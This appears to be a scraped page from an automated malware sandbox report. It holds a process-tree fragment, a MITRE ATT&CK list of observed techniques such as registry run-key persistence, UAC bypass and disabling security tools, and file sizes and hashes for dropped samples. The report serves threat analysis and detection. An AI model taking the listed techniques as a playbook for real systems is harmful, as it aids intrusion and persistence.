C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6708 -ip 67081⤵PID:1964
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1464
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
6Scripting
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
701KB
MD5cb960c030f900b11e9025afea74f3c0c
SHA1bbdcad9527c814a9e92cdc1ee27ae9db931eb527
SHA25691a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99
SHA5129ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554
-
Filesize
10KB
MD52a94f3960c58c6e70826495f76d00b85
SHA1e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA2562fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
Filesize313KB
MD5fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
Filesize1.4MB
MD563210f8f1dde6c40a7f3643ccf0ff313
SHA157edd72391d710d71bead504d44389d0462ccec9
SHA2562aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA51287a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
Filesize92KB
MD51106972c03e704a5e316310ba69cfb3c
SHA143236560be831aca4790d7985bd5a5f20c31d888
SHA2564c4b36e24b611fb0438786721131d314a42700863ff2bb39000492eab5092f2f
SHA5124a19194fe8cb17c9036f399366ca8ecb9218864f3cca9bd73d23ca5218107bff3cd9a028c0db33221c5dc490a57b7e01ce632cd19f1ad3aa81d8ae14ffe7d4d8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
Filesize3.4MB
MD584c82835a5d21bbcf75a61706d8ab549
SHA15ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA51290723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
-
Filesize
660KB
MD5d8337d7ca38eddace5472f7a274b3943
SHA1273fc254a6051aaf13d74b6f426fd9f1a58dee19
SHA2563ac6dde9c9dfcaed7066ea5af5121fd75a7c6c1ab9bb7bb4ca35784d50efa202
SHA512c65082f8478a7dfae7c244e093f34b8cd67599ab20e39a7db3fc50b346039588772764a4f737ad71fff74655534d6c307338c36de6ca209c5ff8b41d0171f589
-
Filesize
448KB
MD5700a9938d0fcff91df12cbefe7435c88
SHA1f1f661f00b19007a5355a982677761e5cf14a2c4
SHA256946583a0803167de24c7c0d768fe49546108e43500a1c2c838e7e0560addc818
SHA5127fa6b52d10bcfc56ac4a43eda11ae107347ba302cc5a29c446b2d4a3f93425db486ed24a496a8acd87d98d9cfb8cad6505eb0d8d5d509bc323427b6931c8fff8
-
Filesize
381KB
MD553b65ec2bc88c315eaebbe67dbc6f4d1
SHA101e59c8db013a63e48a07ecc6e3313d55a54c299
SHA256b5c8a8783b45aac8f9c276e4ca00306e40824b80af930ce36b4fb05332b4bdc9
SHA512d729ab611880a2bd128ae2abfcaeaa9f9f79a8e8feafba38dae84453c11bcea71631846eee5b7d961f1cbd03f31f6ff4f8a0283ba6e3f1bdc6c7c3ecc4842125
-
Filesize
742KB
MD5a8b8b90c0cf26514a3882155f72d80bd
SHA175679e54563b5e5eacf6c926ac4ead1bcc19344f
SHA2564fe94f6567af0c38ee6f0f5a05d36286c0607552ea97166a56c4f647e9bf2452
SHA51288708b20357f1d46957d56d80ac10479cffad72d6bb0268383d360e8904f341c01542b9bbe121b024ef6d6850a1ea4494e077ff124bc9201ae141c46ab1359a4
-
Filesize
37KB
MD535c2f97eea8819b1caebd23fee732d8f
SHA1e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA2561adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf
-
Filesize
1.4MB
MD5b1b49a97a1d8ffa0e79894d2c5c9d1ce
SHA14c683818039174029fb00735cbfcd609fbc638bd
SHA256ba659cae33cd1fdf6f14820c9912558624cd0e75f79f5ad2be7b9db0a6e8480a
SHA51275646bec8bb8c4e9afb7dab874f32a2e2fc1b63f5905b5936ac7c9a8825e0658a68100c1bbaccc45c22c1f6955da4c7ae41405e0561df2fd48898c645e821caa
-
Filesize
50B
MD56a83b03054f53cb002fdca262b76b102
SHA11bbafe19ae5bcdd4f3710f13d06332128a5d54f7
SHA2567952248cb4ec97bc0d2ab3b51c126c7b0704a7f9d42bddf6adcb04b5657c7a4e
SHA512fa8d907bb187f32de1cfbe1b092982072632456fd429e4dd92f62e482f2ad23e602cf845a2fd655d0e4b8314c1d7a086dc9545d4d82996afbccb364ddc1e9eae
-
Filesize
60B
MD5f295caaf061f9ab446a51e01805aefae
SHA1b9a4b804f6a95e7a782d4c5c6c3396f9707fd738
SHA256b59878c41d52be69d5c5a7faf6df19c039d6e5774a5181dced71c4bffd122c89
SHA51206c0be233881572f04a6dce9ec159e8f0102c5d8033708f054649383e77a5b7aa878bc63d7cab7a507a8145dc13643668374814e5c8314bfdcb4e709039a509f